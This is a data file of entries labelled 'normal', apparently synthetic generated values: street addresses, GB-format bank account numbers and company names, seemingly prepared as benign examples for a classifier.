+normal,'847 Griffin Hollow' +normal,'399 Flowers Streets' +normal,'6267 Sutton Gardens Suite 302' +normal,'6823 Small Bridge' +normal,'31064 Donald Curve' +normal,'7987 Hayes Dam' +normal,'58073 Christina Courts Apt. 911' +normal,'8581 Davis Expressway Suite 435' +normal,'601 Lucero Station' +normal,'261 Greene Brook Apt. 585' +normal,'739 Carroll Parks Apt. 143' +normal,'3195 Lindsey Isle Apt. 725' +normal,'136 Barry Mountains' +normal,'003 John Ridges Suite 337' +normal,'8634 Molly Corner Apt. 165' +normal,'02646 William Coves' +normal,'821 Sanchez Road' +normal,'3062 Bryant Estates Suite 419' +normal,'22606 Perkins Throughway Apt. 658' +normal,'2080 Carter Park' +normal,'18489 Juan Mill Apt. 307' +normal,'7211 Lori Road' +normal,'06632 White Corner Apt. 292' +normal,'82430 Ronald Port Suite 330' +normal,'1595 Laura Islands' +normal,'4570 Richardson Unions' +normal,'69024 Rojas Turnpike' +normal,'113 Williams Ridges Suite 356' +normal,'1728 Anthony Groves Apt. 715' +normal,'203 Nicole Cliff' +normal,'672 Hunter Ford Apt. 778' +normal,'08036 Kristin Street' +normal,'24530 Rogers Mountain' +normal,'554 Thomas Courts' +normal,'0513 Isaac Ports' +normal,'154 Ashlee Squares' +normal,'056 Edwards Extensions Apt. 633' +normal,'992 Hunter Valleys' +normal,'29024 Allen Walk Suite 803' +normal,'709 Elizabeth Row Apt. 300' +normal,'07083 Cross Dale Suite 437' +normal,'99475 Perry Glen' +normal,'05772 Collin Curve' +normal,'0187 Arnold Radial Suite 312' +normal,'021 Linda Rue' +normal,'760 Jerry Port Apt. 769' +normal,'3980 Gray Divide Suite 131' +normal,'6221 Timothy Isle' +normal,'1681 Cory Point' +normal,'644 Blake Islands Apt. 595' +normal,'12528 Kristie Circles Suite 880' +normal,'281 Robinson Lakes Suite 076' +normal,'69034 Chan Mountain' +normal,'36175 Sergio Circles Suite 783' +normal,'3170 Kevin Turnpike' +normal,'164 Vang Points' +normal,'50107 Catherine Isle Suite 303' +normal,'7589 Crystal Garden' +normal,'95990 Kayla Isle Apt. 788' +normal,'840 Angela Rapids Suite 084' +normal,'30504 Bishop Views' +normal,'9074 Fox Park Suite 688' +normal,'7559 Megan Port' +normal,'01905 Michael Street Suite 677' +normal,'81609 Torres Mall Apt. 042' +normal,'5393 Alexander Plaza Suite 828' +normal,'8883 Raymond Views Suite 036' +normal,'335 Martinez Plaza' +normal,'477 Roberts Springs' +normal,'97551 Quinn Crossroad Apt. 494' +normal,'33652 Alexander Rapid Apt. 068' +normal,'78106 Samuel Track Suite 746' +normal,'157 Richard Viaduct' +normal,'113 Allen Pass Apt. 210' +normal,'11213 Marks Union' +normal,'299 Lopez Brook Suite 937' +normal,'77508 Chad Streets Suite 217' +normal,'GB66QAVA13160254301533' +normal,'GB89ISZM95833199982499' +normal,'GB30OLLX73556902675741' +normal,'GB31RDUL28905652309872' +normal,'GB22WTNH89420987709628' +normal,'GB75NDBA13298547245534' +normal,'GB12LCBM88779391714793' +normal,'GB95ZTYN85698401528201' +normal,'GB91HHRW88778151537111' +normal,'GB94UPVE74172984829310' +normal,'GB76UBJI73789356368921' +normal,'GB28SHUN43422451258613' +normal,'GB38LMFF64920504759293' +normal,'GB33VZCW03079567111313' +normal,'GB62NGZG73032062085615' +normal,'GB98NVAN65556556518881' +normal,'GB96TXRN13141443792409' +normal,'GB75ZPZJ81141343594391' +normal,'GB50QURO75261661037584' +normal,'GB13MXWP00903553277084' +normal,'GB85BAJR21686563341462' +normal,'GB30UEFS24456421573277' +normal,'GB25ZRHU41055930275873' +normal,'GB97LCJD94128990727732' +normal,'GB23UTXX39260923765971' +normal,'GB20QSQK13710702731269' +normal,'GB90SQAF65599503424244' +normal,'GB52OQAA56909353588419' +normal,'GB21CEKQ25920495521514' +normal,'GB68BVCQ70599146599212' +normal,'GB33WJIY05578582373590' +normal,'GB70CDCM83716730962895' +normal,'GB22ZYKU34091570241672' +normal,'GB46SIME80242603791093' +normal,'GB77SFZT88523078978595' +normal,'GB60ZZVP16779769266064' +normal,'GB61BYZJ30944595332499' +normal,'GB46NCCM27408507005504' +normal,'GB60EYZI14456725329840' +normal,'GB57YGIN40537171859321' +normal,'GB35KBIS01033121909970' +normal,'GB09RDNO71637087547809' +normal,'GB72LTPP39314405157822' +normal,'GB46UZHY80624583388139' +normal,'GB91GXTE22283686843072' +normal,'GB35LVDN18919953831004' +normal,'GB75NLDA01045895411344' +normal,'GB20SUZQ06821401392071' +normal,'GB54KDLW50614864618855' +normal,'GB77KLMZ83267777859022' +normal,'GB17EQBR75963345427845' +normal,'GB61FDID02498200201075' +normal,'GB46BAYI46029641941723' +normal,'GB73PIZP71625963550738' +normal,'GB24IBDB41486618800970' +normal,'GB82YMXR29301973654480' +normal,'GB67OFLC39825177181541' +normal,'GB48FFJH89068152259856' +normal,'GB36LAWU27304222033811' +normal,'GB43WOPQ19196692239683' +normal,'GB88ATSO76596138051155' +normal,'GB70IFCV50996362548999' +normal,'GB82SFQF30338372566091' +normal,'GB72ZRCQ44027470121931' +normal,'GB10BBDB30717414225600' +normal,'GB05LGRP87431214486797' +normal,'GB24GJMQ95881376689448' +normal,'GB10IUHA43557439326840' +normal,'GB59CVQA35631629283486' +normal,'GB25YVPN31085950769493' +normal,'GB69VPWT92399582158856' +normal,'GB07NSOL01174387987848' +normal,'GB25XGNC99370315549653' +normal,'GB19OECG83733286132713' +normal,'GB06UKUI80202190357674' +normal,'GB20FXJP77934889829324' +normal,'GB79DNLS76998164926004' +normal,'GB42QKFV49795588696122' +normal,'GB41WHDX88431770420781' +normal,'GB82EMJT37596480005124' +normal,'GB04YAZI06601684334115' +normal,'GB37MQBL34607952106824' +normal,'GB20ALJT97214982874018' +normal,'GB83HNSU69065158388526' +normal,'GB98PGZA74734420229259' +normal,'GB20WHJB79259088268379' +normal,'GB12NGLK94968936502216' +normal,'GB64PHZA96197421756551' +normal,'GB11UAQQ87701029164424' +normal,'GB95PPOM59558261875711' +normal,'GB64HUCL42936196803520' +normal,'GB38XYCW68051992149870' +normal,'GB39QTDF03415253096611' +normal,'GB44MSQQ10898715369489' +normal,'GB68BAEM93729544001398' +normal,'GB12DNBK15457084958551' +normal,'GB56TEEW45265176285837' +normal,'GB88MGVF59879412353038' +normal,'GB53DWXS81057909227195' +normal,'GB95RCIZ38002137221289' +normal,'GB34DAYS49439391251916' +normal,'GB22CFYY28981322485993' +normal,'GB91XWAK64477761128130' +normal,'GB62QWTD16515796738067' +normal,'GB40GJPU87506304829665' +normal,'GB04JDJI36557737264175' +normal,'GB11EWRY14294253774145' +normal,'GB37AASA75060001145058' +normal,'GB65BXWK36258880415781' +normal,'GB02WTOH53664159757893' +normal,'GB80TANI75643704532526' +normal,'GB02KGCO76704883004242' +normal,'GB87WVQE87853980270803' +normal,'GB83ZWBS68156152290696' +normal,'GB62UQUG02873409554899' +normal,'GB66HKPF18048937788208' +normal,'GB07YXJF16761142139420' +normal,'GB93TWIE73391680508453' +normal,'GB28WPJW66710940973973' +normal,'GB52VLJP39100530367010' +normal,'GB64JEEL91159511833620' +normal,'GB61JAOC69806235051813' +normal,'GB44KPKA23488584150784' +normal,'GB08UCYJ15701620577842' +normal,'GB43SSUW02515384215292' +normal,'GB17PTSU24749762696311' +normal,'GB14ZRTF06435720553086' +normal,'GB20RRAA98330867401790' +normal,'GB68FDQQ74065564673739' +normal,'GB68JRXV66211008398419' +normal,'GB72HWSF61431168027495' +normal,'GB81KMTW95298520597412' +normal,'GB30MHKW82028504866984' +normal,'GB11ZXPF75733921805348' +normal,'GB75TFIB62265716324967' +normal,'GB80SROZ25675098875854' +normal,'GB23CCET51452620743693' +normal,'GB66QFRJ27315383760013' +normal,'GB56WBFO88860123245219' +normal,'GB76FDVA34346244443098' +normal,'GB15WPDA95817098953427' +normal,'GB78EAZG33625801399058' +normal,'GB75MJWY09671191090734' +normal,'GB20PHCZ21676719644033' +normal,'GB08JZSZ99574716414083' +normal,'GB13LTAM73544015076011' +normal,'GB04KVYQ00654307505901' +normal,'GB67NDUQ29927738179546' +normal,'GB68RSVP58757805857182' +normal,'GB90TMQD38684979513718' +normal,'GB41IGJF19005189315639' +normal,'GB95MBAA50680623031105' +normal,'GB98KSJC62036554393619' +normal,'GB19TZVS84717539530310' +normal,'GB06FKTR28272583529159' +normal,'GB36SKZE84356316502962' +normal,'GB56BXGU03720985508928' +normal,'GB91IAPY53508705432092' +normal,'GB61WJIF26971692578356' +normal,'GB04XQHB64571848478584' +normal,'GB89ZILG50775832587897' +normal,'GB41KYGA03766112541219' +normal,'GB28AMNZ83105801031919' +normal,'GB29ZYON33785082400079' +normal,'GB96ZKPQ40994753770182' +normal,'GB54YACC99838250913156' +normal,'GB43EQLN74500001831222' +normal,'GB61RWPM62341181218684' +normal,'GB17LBQQ73888752309067' +normal,'GB82VFOK39211755633560' +normal,'GB65WTMA91926627329126' +normal,'GB08SIDD77810622367932' +normal,'GB09TSMJ52793828318206' +normal,'GB02YPJH24618467110195' +normal,'GB40RYKB69838300930696' +normal,'GB29SHGA21536481001068' +normal,'GB98YRQA94949328530233' +normal,'GB47KJJT91860159369234' +normal,'GB15IXFI43598491703722' +normal,'GB35LRXO20679948242585' +normal,'GB28PDUG49437800546631' +normal,'GB97AXTW21817871142481' +normal,'GB55BIXC23732950573738' +normal,'GB22PFQG00083037473935' +normal,'GB69JMXO00836099928024' +normal,'GB81EXSC69868621732095' +normal,'GB49XPCX60607816004166' +normal,'GB06MXXT60126119706959' +normal,'GB37BMIG23480900050066' +normal,'GB55ONMS54244834837411' +normal,'GB92HYXH01506447430932' +normal,'GB53ZRAS62785660804603' +normal,'GB87ZEWB54984332645088' +normal,'GB68EASO22268699622561' +normal,'GB57GWFD02668567731057' +normal,'GB54FMMG75693980669658' +normal,'GB58UDMQ00621160838235' +normal,'GB56WOOM75495031266720' +normal,'GB77DFIQ50234045542179' +normal,'GB92DGFI17568904211547' +normal,'GB14UMIM36930311593383' +normal,'GB61KEIC83066006216356' +normal,'GB05PJYX89873643040308' +normal,'GB75AXLY00197242368814' +normal,'GB51YIXZ94930998166872' +normal,'GB68SBAB62697480620827' +normal,'GB64YJQI51787744540557' +normal,'GB56JQIV37214891270364' +normal,'GB37ITKM11577474838823' +normal,'GB24KBGU01807477962334' +normal,'GB18IDOE44612671728719' +normal,'GB21BSLK78588482587398' +normal,'GB14UIXF34777815830381' +normal,'GB15YARV49871909279265' +normal,'GB54SDKY45047646914950' +normal,'GB16JCGR03335460605869' +normal,'GB57YESB25501881813219' +normal,'GB63HXEQ66329544978115' +normal,'GB35LFFN23571955642460' +normal,'GB20CRAQ71709795124628' +normal,'GB79YXXJ61225257748112' +normal,'GB74DWDB61118439555533' +normal,'GB15JUIV98590878255845' +normal,'GB13MDAU58826711448948' +normal,'GB65QKAG32305147583252' +normal,'GB29FSHG13262078392862' +normal,'GB33VGRO83875322831457' +normal,'GB46LVIW10131149975531' +normal,'GB71MLFT37302839093842' +normal,'GB11JEQO38935058842635' +normal,'GB48JYCC49919500707048' +normal,'GB73IEKG06613484319828' +normal,'GB71FOUH90610035258936' +normal,'GB68HFXG47907039661184' +normal,'GB40BANF08975752760128' +normal,'GB41KETG71507697736932' +normal,'GB51BKDF40120739846748' +normal,'GB19HMCX50678088512375' +normal,'GB15WTXY99610228638928' +normal,'GB21VOCP74307412221774' +normal,'GB10YJAU99630182633911' +normal,'GB53YCKD78642176480033' +normal,'GB11RKBK73123734111028' +normal,'GB70GMGS11184621358568' +normal,'GB73MACF60277152153441' +normal,'GB93HCJT80753902639525' +normal,'GB03UOSO03512160535307' +normal,'GB62QIPR45090834455913' +normal,'GB86VAKG90506573121842' +normal,'GB30RGNF17472660170328' +normal,'GB88POHM89386348520623' +normal,'GB94UIRY14981407749966' +normal,'GB37FBZX39634005529423' +normal,'GB22ZIIO56642850911537' +normal,'GB28ROCC99351824175003' +normal,'GB15PYEQ31772137949599' +normal,'GB94OCUS61311980569207' +normal,'GB18AVOT56516447959785' +normal,'GB44ZGNL41532788194391' +normal,'GB45KBOJ33885473716854' +normal,'GB21FQEI42184169531301' +normal,'GB61YTBY57539156072797' +normal,'GB15NYLN22560303022319' +normal,'GB07WGRP33991312170152' +normal,'GB46YIIT68161515576424' +normal,'GB12ZTBO80311795776823' +normal,'GB15ZOMT49522630294366' +normal,'GB89EBKF68355424109291' +normal,'GB69FLKL17029975836276' +normal,'GB95LMKW28145313130084' +normal,'GB69YVWR61711605772143' +normal,'GB38XNOR10869748394916' +normal,'GB66EJAD71844048245200' +normal,'GB24FLGA65946400427499' +normal,'GB11FXUL47091414530175' +normal,'GB19MQSI27281282890534' +normal,'GB16VUNL88232499313578' +normal,'GB85ZDGZ24954692555186' +normal,'GB27BDTV67800698433630' +normal,'GB76RLUX28539039018161' +normal,'GB11ODKP96975976928383' +normal,'GB92FDTD88078064783847' +normal,'GB03GENK50863472642394' +normal,'GB10QUGO70101275093510' +normal,'GB17OGBE12912149512493' +normal,'GB93IUZI94302412885495' +normal,'GB24XMVO38103929995381' +normal,'GB52EKGO99773751181627' +normal,'GB06DDHO63960322521951' +normal,'GB79XVKE59483746070578' +normal,'GB64EMXM60151406189806' +normal,'GB29RYFE36484646728585' +normal,'GB37YIKR86533016098477' +normal,'GB69OVDW24953328604167' +normal,'GB54MDOJ04916845107357' +normal,'GB17RLEV76188259256036' +normal,'GB03BFVM33807596370747' +normal,'GB17SWFL32708929695921' +normal,'GB81IJSP83294179525169' +normal,'GB03QRBY15624529156862' +normal,'GB96IAIA86932849500569' +normal,'GB54ZBAZ39728802583732' +normal,'GB24CVWL08174496944325' +normal,'GB42IPZY73773364345147' +normal,'GB06RFCX72737026928558' +normal,'GB35QVYG98639348090016' +normal,'GB27KLDU40299542163447' +normal,'GB78AZQM72351200341515' +normal,'GB27WFLD30781213123525' +normal,'GB85RHIR32093189484291' +normal,'GB12MNML90892595844894' +normal,'GB48HURF23661821570514' +normal,'GB69MSNU14039797931827' +normal,'GB12GRHU28770816000056' +normal,'GB64ISSG58946340322473' +normal,'GB37HYTE19401279226038' +normal,'GB26XCSL62568004090029' +normal,'GB11IASP80480016238531' +normal,'GB57SRZI39118646550614' +normal,'GB77NZVE46048725522425' +normal,'GB07BPVC66178820806826' +normal,'GB51KPCW07139430722525' +normal,'GB20YHYE43183058158848' +normal,'GB95AXSN94177755261492' +normal,'GB67PCSN50041911745435' +normal,'GB44IZXD15460446246885' +normal,'GB91YALT64403551673064' +normal,'GB02QSQL39398819111942' +normal,'GB72WVMR03278690328208' +normal,'GB91SKLA21952211957089' +normal,'GB80JTVQ62855688679719' +normal,'GB83JPNB62783089118030' +normal,'GB45LDHM78723012193166' +normal,'GB62CSMC48736748390868' +normal,'GB91QSOH64924919597607' +normal,'GB34VDSP34949584953267' +normal,'GB61LKRW36574247291157' +normal,'GB92IXAK73684613760394' +normal,'GB26VJSI88214015231488' +normal,'GB24EMNQ57484374605874' +normal,'GB06PCJD70312920984902' +normal,'GB14TCUO35966279318676' +normal,'GB48HLJZ26365468699709' +normal,'GB91ZGHQ35238799408903' +normal,'GB19PEYA36757012020246' +normal,'GB32XDLC63250034956914' +normal,'GB27JBET43018552285764' +normal,'GB75FLTE98389834821364' +normal,'GB02LRSN10907694245573' +normal,'GB42AIJF89278536563439' +normal,'GB56HXIM62166551949420' +normal,'GB90YFQK52199727469463' +normal,'GB41LAZG14296682073316' +normal,'GB90THOJ49388259703846' +normal,'GB75NMZI67879767566731' +normal,'GB02WJWV95337189931526' +normal,'GB05HSUE48404383809673' +normal,'GB98KSBA26272199052553' +normal,'GB08IBKT88543237567443' +normal,'GB32LRNZ88585240226765' +normal,'GB72IRRP36323611557255' +normal,'GB60SZKB30319657327091' +normal,'GB71DTTT00106486915288' +normal,'GB38GTBV89289486324583' +normal,'GB46JIDK95803466580701' +normal,'GB90GNEX36437554449263' +normal,'GB08JGEN50571229235002' +normal,'GB88ABTZ91695418363834' +normal,'GB96HKXD43803139225318' +normal,'GB24HZNL25335634033855' +normal,'GB59NAEV96510007468299' +normal,'GB78RFUT87932865487858' +normal,'GB21MOJD00950551474355' +normal,'GB41GBIE87811749586544' +normal,'GB44VNZV51133620909467' +normal,'GB71HMAI69368107399312' +normal,'GB26ICZS14169265010289' +normal,'GB25YHFZ67814446416208' +normal,'GB51DAXH26063829707838' +normal,'GB52IYYP19173671994769' +normal,'GB79WXIX44573319173384' +normal,'GB93DFYS03560400149703' +normal,'GB09CFNI75346137211195' +normal,'GB35LLHP13213247745846' +normal,'GB35JCGR73476907762577' +normal,'GB59ITGV12064936333769' +normal,'GB08WSVW40033149248429' +normal,'GB28FTKW52579499544881' +normal,'GB70KSBT24880946092013' +normal,'GB16JVDU33246994862525' +normal,'GB50TEJP71913622183799' +normal,'GB18HHWR48925841579026' +normal,'GB89XOLY69095246724845' +normal,'GB91OQEK41362685337848' +normal,'GB55FQAZ79452993431351' +normal,'GB65ZSJF76211731280941' +normal,'GB51SDCP25432243312204' +normal,'GB45RUJX20213385458794' +normal,'GB47RQCA37528764220821' +normal,'GB16RBGV54932373461958' +normal,'GB26MZLE09232822852340' +normal,'GB94FKKO04667866469039' +normal,'GB71NHCQ91006325434066' +normal,'GB03VMIT66761887293741' +normal,'GB36NAWD87775924846706' +normal,'GB35OQQG06077590738195' +normal,'GB69RRHW16515566740186' +normal,'GB07WSQY10595429951274' +normal,'GB79KLWG92410739475817' +normal,'GB47SFAM07841042620634' +normal,'GB69KBQG28203156297404' +normal,'GB59WXYL29536161691822' +normal,'GB87EQNF56653723024823' +normal,'GB09KLYR94422988133131' +normal,'GB77VIIB74876369911294' +normal,'GB68ZYBL35259148279618' +normal,'GB21RVTI96339846220822' +normal,'GB15DCYA33375153276307' +normal,'GB06KZVU70669220272768' +normal,'GB35DOOP49417882681145' +normal,'GB02RLLA29991428267434' +normal,'GB93ZGOJ21097311248024' +normal,'GB18EBMA00678859445821' +normal,'GB64TWFO51467885856729' +normal,'GB16ZCTM25445329297016' +normal,'GB86OUJT91314272771550' +normal,'GB83MRVU29829236494233' +normal,'GB46BRVM44538689164306' +normal,'GB62MNDQ37070901921428' +normal,'GB06JYDQ86092596624364' +normal,'GB24EMWH09433772993874' +normal,'GB64TTGH93776245887199' +normal,'GB85TXVD24614798451519' +normal,'GB68RLEL56670138718827' +normal,'GB75ABPC43675183180475' +normal,'GB89AJJL43688770494758' +normal,'GB71FTPP40166256444800' +normal,'GB26AICW22255588659399' +normal,'GB90ZJYX19130426510624' +normal,'GB71XBFS64351830001678' +normal,'GB84PPOB77693866640491' +normal,'GB79KQAI62394769648875' +normal,'GB77XRTS35107120874422' +normal,'GB48JBSW95648281218865' +normal,'GB91PTEZ73040085131886' +normal,'GB07MMKH06523757639337' +normal,'GB68SCGD83517050236136' +normal,'GB95IUTG64948333576121' +normal,'GB51DAQB51863961296724' +normal,'GB29DURY12110078648674' +normal,'GB12BDON05427594144570' +normal,'GB38PVGE60643035729547' +normal,'GB14NYZW54791900691685' +normal,'GB07VFHF21592357732659' +normal,'GB69WGDX47521472938786' +normal,'GB74DUOF70712218216158' +normal,'GB52VRDL66623572397816' +normal,'GB36RAHL66364752085544' +normal,'GB88LZJC30739001614555' +normal,'GB84XYWR59054322086868' +normal,'GB90TQEE71210210869867' +normal,'GB68QRBV92133648326696' +normal,'GB88FKGK47749537593250' +normal,'GB78APDP36156716806157' +normal,'GB16ZEQH19825930927072' +normal,'GB27WPDU41229578997967' +normal,'GB22OREH25092652542188' +normal,'GB66SKOX74175888899640' +normal,'GB33UYRN96973951021376' +normal,'GB57VVFQ80093730980201' +normal,'GB40BHKE57049423329830' +normal,'GB71PLMU45168327911754' +normal,'GB42MQPF67267341582865' +normal,'GB30HJUQ20085221504065' +normal,'GB03RRWX00850040182373' +normal,'GB06NNWZ08789136453834' +normal,'GB31IVSI87885428198916' +normal,'GB57KIYN97650574596578' +normal,'GB47FKCL25917434181460' +normal,'GB25XNSW72046379603403' +normal,'GB85OBBR73549419109895' +normal,'GB40CRMR79048320713695' +normal,'GB95OMSD51538906669825' +normal,'GB85ZSGQ67673260659823' +normal,'GB85YLDJ61409360876590' +normal,'GB86VWQG84277434903374' +normal,'GB23QHZP07203615798594' +normal,'GB37JOEW40249579992568' +normal,'GB08JQMR64442910555487' +normal,'GB12GFOI02056074162948' +normal,'GB95CKTP11865287085591' +normal,'GB23FAAA55838277859087' +normal,'GB71WYWW49670708878216' +normal,'GB28IMCW22934824159485' +normal,'GB41QJWW69841108842482' +normal,'GB65WZLK92712839318665' +normal,'GB25YMXV29686093905457' +normal,'GB07SARC26835649560684' +normal,'GB10OSGP30503695210065' +normal,'GB51RKXM24995564199429' +normal,'GB78GYWG58899466730188' +normal,'GB28LMPM96509830422069' +normal,'GB88WPTH30548410985083' +normal,'GB36GRJG81061853240501' +normal,'GB27XDBZ83349927196936' +normal,'GB16SIHQ34379748142894' +normal,'GB93FSBO49017870265060' +normal,'GB21AZCT52296018002107' +normal,'GB03NIBS92028186464011' +normal,'GB42EURN82394359859067' +normal,'GB34BGWE78539944896578' +normal,'GB58QLDC83254797407712' +normal,'GB82VTPE69471326710055' +normal,'GB57KBGT73995479607591' +normal,'GB14BJOA67309360434674' +normal,'GB10HEPU83814033372207' +normal,'GB56ILGW69331155907308' +normal,'GB57ZGQF69208349158916' +normal,'GB13LSGT88434744902079' +normal,'GB47CMRM23906172590907' +normal,'GB24JMWR82995998883415' +normal,'GB18DKPE37666931560813' +normal,'GB41WKGV48851741501960' +normal,'GB24MIPZ62799022621631' +normal,'GB46KNJK48700581910224' +normal,'GB61GICJ53711315246011' +normal,'GB59ELBO00154053166521' +normal,'GB37MTZH09140155242965' +normal,'GB58OOWN40750476180175' +normal,'GB30URLJ86864693771397' +normal,'GB38AYUN54523452049068' +normal,'GB53NLBJ57481270317809' +normal,'GB34YVHV95597249592055' +normal,'GB97IQEW23320934347115' +normal,'GB02VRNS19994084912603' +normal,'GB73TRQX97184074438969' +normal,'GB62PNSX28311845648672' +normal,'GB57WUBS28573070558920' +normal,'GB27PDXN38762874107764' +normal,'GB36WJXE26183900827540' +normal,'GB60QYPV22711849664319' +normal,'GB54SGIP02218747339406' +normal,'GB66YHUE21820534160651' +normal,'GB97VKOW69151554574059' +normal,'GB46CUNT96857942938632' +normal,'GB23YOWM34522201818539' +normal,'GB47NGVR76405349381868' +normal,'GB87UZIV13851226198672' +normal,'GB34AFBZ63714501313542' +normal,'GB37YXPT01226099277274' +normal,'GB22GOTC23608423343612' +normal,'GB39XEIF95834874945861' +normal,'GB58KTWM32189789591223' +normal,'GB52TYCY35281954550217' +normal,'GB57AAIS51206972930735' +normal,'GB03HWNI03282109439445' +normal,'GB46LUUM59448965602101' +normal,'GB60XJFH41061932949545' +normal,'GB42YJHB48014913849125' +normal,'GB79PKII67168721950412' +normal,'GB80OGIH07431685872671' +normal,'GB61ISNV27696532471729' +normal,'GB43UPTA95805229201854' +normal,'GB75FJAU02574001740635' +normal,'GB50IBWO22372517526537' +normal,'GB55GXCR03177328488929' +normal,'GB95FYTH44058320229048' +normal,'GB68LNQZ56537542057920' +normal,'GB38VGZQ71826751119847' +normal,'GB65FDJT08929104151259' +normal,'GB75UYGM69111022647262' +normal,'GB19JGNF06526071135966' +normal,'GB92ATFF76119449452649' +normal,'GB03BJLU53915685321317' +normal,'GB39PEPH52988740687641' +normal,'GB18GFQM72289902907151' +normal,'GB36HYLU21796085226918' +normal,'GB05NIDL12674241607636' +normal,'GB33IREB64245968758795' +normal,'GB56FKEN13409242638296' +normal,'GB03KDGI19483300364249' +normal,'GB56ENVU53564856363927' +normal,'GB67JQRY35343579599604' +normal,'GB14KOUQ16487955299974' +normal,'GB06TDAK46837336847638' +normal,'GB08WDNH40466518685859' +normal,'GB18OVKO32908764411394' +normal,'GB03ILRB40085637225814' +normal,'GB25DFZO06765051639447' +normal,'GB31OWBP04927434200662' +normal,'GB17VOXR20979051583099' +normal,'GB42LJUC83390504145190' +normal,'GB72SDNO83273483678927' +normal,'GB10UVDS66898613414233' +normal,'GB44IJQT28786909373234' +normal,'GB15NOIO24960592216015' +normal,'GB22SMOF93270743510033' +normal,'GB13YCUB90340416287293' +normal,'GB32JWKF02568532892066' +normal,'GB31GGFV36387956094481' +normal,'Simpson Group' +normal,'Williams and Sons' +normal,'Walters Ltd' +normal,'Nguyen-Walker' +normal,'Norris, Mendoza and Carpenter' +normal,'Scott and Sons' +normal,'Wilson, Davis and Horn' +normal,'Carpenter-Robinson' +normal,'Nguyen-Grant' +normal,'Burns-Stewart' +normal,'Martin Ltd' +normal,'Mcgrath, Raymond and Owens' +normal,'Bautista-Saunders' +normal,'Edwards and Sons' +normal,'Lozano PLC' +normal,'Jackson-Coleman' +normal,'Jimenez-Wilkins' +normal,'Ortega, Baird and Warner' +normal,'Orozco, Hines and Kirby' +normal,'Johnson, Thompson and Roman' +normal,'Fields, Cooper and White' +normal,'Poole, Garza and Allen' +normal,'Mcmillan and Sons' +normal,'Nguyen, Green and Moran' +normal,'Fuller, Smith and Perez' +normal,'Herring, Erickson and Smith' +normal,'Best and Sons' +normal,'Leach, Ford and Smith' +normal,'Norris-Moss' +normal,'Brown-Walters' +normal,'Davis PLC' +normal,'Hood-Gillespie' +normal,'Peterson Group' +normal,'Austin Group' +normal,'Lopez, Herring and Martinez' +normal,'Elliott-Reed' +normal,'Fletcher, Martin and Harris' +normal,'Watkins and Sons' +normal,'Johnson-Williamson' +normal,'Dodson-Miller' +normal,'Diaz-Prince' +normal,'Soto, Ferguson and Weber' +normal,'Webb, Wallace and Smith' +normal,'Lewis-Washington' +normal,'Roberts, Brewer and Smith' +normal,'Valencia-Juarez' +normal,'Wu Ltd' +normal,'Davis Group' +normal,'Johnson PLC' +normal,'Long, Lopez and Bright' +normal,'Shaw, Hanson and Alvarado' +normal,'Warren-Johnson' +normal,'Diaz-Sanchez' +normal,'Harrington, Frazier and Jones' +normal,'Watson-Jones' +normal,'Medina PLC' +normal,'Long-Brennan' +normal,'Oneal and Sons' +normal,'Knox-Meadows' +normal,'Hernandez Inc' +normal,'Johnson and Sons' +normal,'Hunter-Bradshaw' +normal,'Walker-Alvarado' +normal,'Ferguson and Sons' +normal,'Mendoza Group' +normal,'Blake, Moody and Jones' +normal,'Webster-Gardner' +normal,'Martin and Sons' +normal,'Salas-Arnold' +normal,'Wilkerson, Thompson and Mcgrath' +normal,'Miller LLC' +normal,'Madden-Johnson' +normal,'Dominguez-Jordan' +normal,'Gutierrez-Brown' +normal,'Morris Inc' +normal,'Ball-Roman' +normal,'Hayes-Trevino' +normal,'Thomas, Singleton and Bailey' +normal,'Reid, Phillips and Bonilla' +normal,'Miller PLC' +normal,'Stokes-Miller' +normal,'Harris-Castaneda' +normal,'Torres-Grant' +normal,'Thompson, Wu and Norris' +normal,'Brown, Benitez and Nguyen' +normal,'Evans PLC' +normal,'Contreras Group' +normal,'Bailey Group' +normal,'Williamson Inc' +normal,'Gomez, Gonzalez and Mahoney' +normal,'Lynch-Ford' +normal,'Richardson LLC' +normal,'Howe-Brooks' +normal,'Larsen PLC' +normal,'Holt Ltd' +normal,'Faulkner, Middleton and Smith' +normal,'Johnson, Smith and Price' +normal,'Brown Ltd' +normal,'Navarro, Hill and Rowe' +normal,'Curtis-Burns' +normal,'Burton, Garcia and Riley' +normal,'Duran-Smith' +normal,'Daniels, Hall and Olson' +normal,'Kennedy, Thornton and Sexton' +normal,'Graham LLC' +normal,'Nolan LLC' +normal,'Rosales, Bean and Barry' +normal,'Ray-Smith' +normal,'Reed-Strong' +normal,'Brown, Martin and Bates' +normal,'Cook, Hendricks and Baker' +normal,'Knox, Gamble and Patel' +normal,'Garcia-Campbell' +normal,'Duran Inc' +normal,'Lewis, Scott and Burton' +normal,'Aguilar-Johnson' +normal,'Jordan Inc' +normal,'Kaufman-Blevins' +normal,'Roy Inc' +normal,'Anderson Ltd' +normal,'Butler, Weber and Santiago' +normal,'Archer LLC' +normal,'Best, Johnson and Carter' +normal,'Edwards-Pace' +normal,'Sanders-Cox' +normal,'Sanchez Group' +normal,'Kirk Group' +normal,'Harding Ltd' +normal,'Edwards PLC' +normal,'Smith-Grimes' +normal,'Guzman, Thompson and Pierce' +normal,'Kelly-Pace' +normal,'Wilkinson LLC' +normal,'Brown-Martinez' +normal,'Smith, Sanchez and Campbell' +normal,'Hill PLC' +normal,'Stone-Henderson' +normal,'Mendez-Jackson' +normal,'Rodriguez Ltd' +normal,'Serrano-Conner' +normal,'Williams Group' +normal,'Chavez LLC' +normal,'Castro-Butler' +normal,'Holland-Parker' +normal,'Rangel Group' +normal,'Berry-Wilkinson' +normal,'Yang-Ramirez' +normal,'Bowman-Gentry' +normal,'Thomas-David' +normal,'Medina LLC' +normal,'Bullock, Fields and Bennett' +normal,'Parker-Weaver' +normal,'Campbell, Sawyer and Yu' +normal,'Stone, King and Yoder' +normal,'Smith-Yoder' +normal,'Leblanc and Sons' +normal,'Cohen-White' +normal,'Curry, Arnold and Boyle' +normal,'Warner, Jones and Dean' +normal,'Petty-Roy' +normal,'Martinez, Kramer and Thompson' +normal,'Fleming Inc' +normal,'Moore PLC' +normal,'Dorsey-Cruz' +normal,'Parker-Rodriguez' +normal,'Davis, Sanford and Jones' +normal,'Stokes Group' +normal,'Roach, Dunn and Foster' +normal,'Hull, Sanders and Lewis' +normal,'Oliver Ltd' +normal,'West Inc' +normal,'Lang PLC' +normal,'Alexander, Miller and Hall' +normal,'Ramirez LLC' +normal,'Johnson, Farrell and Johnson' +normal,'Duffy-Phillips' +normal,'Gomez, Smith and Moore' +normal,'Baldwin-Hoffman' +normal,'Hill-Young' +normal,'Miles Ltd' 